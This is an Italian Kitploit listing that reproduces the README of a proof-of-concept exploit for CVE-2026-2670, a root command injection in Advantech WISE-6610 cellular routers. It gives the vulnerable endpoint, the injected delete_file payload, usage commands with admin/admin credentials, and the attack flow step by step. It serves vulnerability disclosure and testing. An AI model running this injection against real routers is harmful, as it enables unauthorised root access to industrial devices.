Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
exploit-CVE-2026-2670 — Proof-of-concept exploit per CVE-2026-2670, una vulnerabilità di command injection nei router Advantech WISE-6610, che consente ad attaccanti autenticati di eseguire comandi arbitrari con privilegi di root. | Kitploit
Strumenti/GitHubGitHub/ali-py3/exploit-cve-2026-2670
Sicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubali-py3/exploit-cve-2026-2670

exploit-CVE-2026-2670

Proof-of-concept exploit per CVE-2026-2670, una vulnerabilità di command injection nei router Advantech WISE-6610, che consente ad attaccanti autenticati di eseguire comandi arbitrari con privilegi di root.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
6 mesi faNon ancora revisionato

exploit-CVE-2026-2670

CVE-2026-2670 – Advantech WISE-6610 PoC di Iniezione di Comandi

Proof-of-concept che dimostra una vulnerabilità di iniezione di comandi nel router industriale cellulare Advantech WISE-6610.

La vulnerabilità esiste nell'endpoint /cgi-bin/luci/admin/openvpn_apply e consente a un attaccante autenticato di eseguire comandi di sistema arbitrari.


📌 Panoramica della Vulnerabilità

L'interfaccia web del WISE-6610 non sanifica correttamente il parametro delete_file durante l'elaborazione delle eliminazioni di configurazioni OpenVPN.

Un attaccante con credenziali valide può iniettare comandi shell utilizzando una pipe (|) seguita da un comando e da una sequenza di terminazione echo$(IFS) per bypassare il filtraggio degli input.

I comandi iniettati vengono eseguiti con privilegi di root.

  • ID CVE: CVE-2026-2670
  • Vendor: Advantech
  • Prodotto: WISE-6610
  • Versione corretta: Non disponibile al momento del rilascio del PoC

⚙️ Requisiti

  • Python 3.6+
  • Libreria requests

Installa le dipendenze:

root@kitploit:~
pip install requests

🔧 Opzioni

Opzione Descrizione

root@kitploit:~
--target	URL di base del dispositivo (es. http://192.168.1.100:8444)
--cmd	Comando da eseguire. Deve scrivere l'output in un file all'interno della root web (es. id > output.txt)
--output	Percorso web del file di output (es. /output.txt). Deve corrispondere al nome file usato in --cmd
--cookie	(Facoltativo) Valore del cookie di sessione sysauth esistente
--username	(Facoltativo) Nome utente per il login
--password	(Facoltativo) Password per il login
--delay	Secondi di attesa prima di recuperare l'output (predefinito: 2)
--debug	Abilita la registrazione dettagliata di richieste/risposte

🚀 Utilizzo

Lo script supporta due metodi di autenticazione:

Fornire un cookie di sessione sysauth esistente

Effettuare il login con nome utente e password

Sintassi di base

root@kitploit:~
python3 exploit.py --target <URL> --cmd <COMANDO> --output <PERCORSO_OUTPUT> \
[--cookie <SYSCOOKIE> | --username <UTENTE> --password <PASSWORD>] \
[--delay <SECONDI>] [--debug]

🧪 Esempi

1️⃣ Utilizzo di un Cookie Pre-Autenticato

root@kitploit:~
python3 exploit.py \
--target http://192.168.1.100:8444 \
--cmd 'id > output.txt' \
--cookie f417ce7d2d576017ff5fd81d7d5f555f \
--output /output.txt

2️⃣ Login con Credenziali

root@kitploit:~
python3 exploit.py \
--target http://192.168.1.100:8444 \
--cmd 'echo "pwned" > output.txt' \
--username admin \
--password admin \
--output /output.txt

3️⃣ Con Output di Debug

root@kitploit:~
python3 exploit.py \
--target http://192.168.1.100:8444 \
--cmd 'uname -a > output.txt' \
--username admin \
--password admin \
--output /output.txt \
--debug

🔍 Come Funziona

1. Recupero del Nonce

root@kitploit:~
Viene inviata una richiesta GET a /cgi-bin/luci/ per ottenere il cookie luci_nonce richiesto per l'autenticazione.

2. Autenticazione

root@kitploit:~
Se vengono fornite le credenziali, lo script invia una richiesta POST a /cgi-bin/luci/ con luci_username e luci_password per ottenere un cookie sysauth.

Se viene fornito un cookie valido tramite --cookie, questo passaggio viene saltato.

3. Iniezione di Comandi

root@kitploit:~
Viene inviata una richiesta POST a:

/cgi-bin/luci/admin/openvpn_apply

Con i seguenti parametri:

act=delete
delete_file=123123|<comando> echo$(IFS)
openvpn_id=1

La sequenza echo$(IFS) aiuta a terminare il comando iniettato e a bypassare i filtri di input.

4. Recupero dell'Output

root@kitploit:~
Dopo un breve ritardo, lo script tenta di recuperare il file generato dal percorso --output specificato.

⚠️ Disclaimer

Questo strumento è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.

L'uso non autorizzato contro sistemi che non si possiedono o per i quali non si dispone di esplicita autorizzazione al test è illegale.

Gli autori non si assumono alcuna responsabilità per usi impropri o danni causati da questo software.

Scarica lo strumento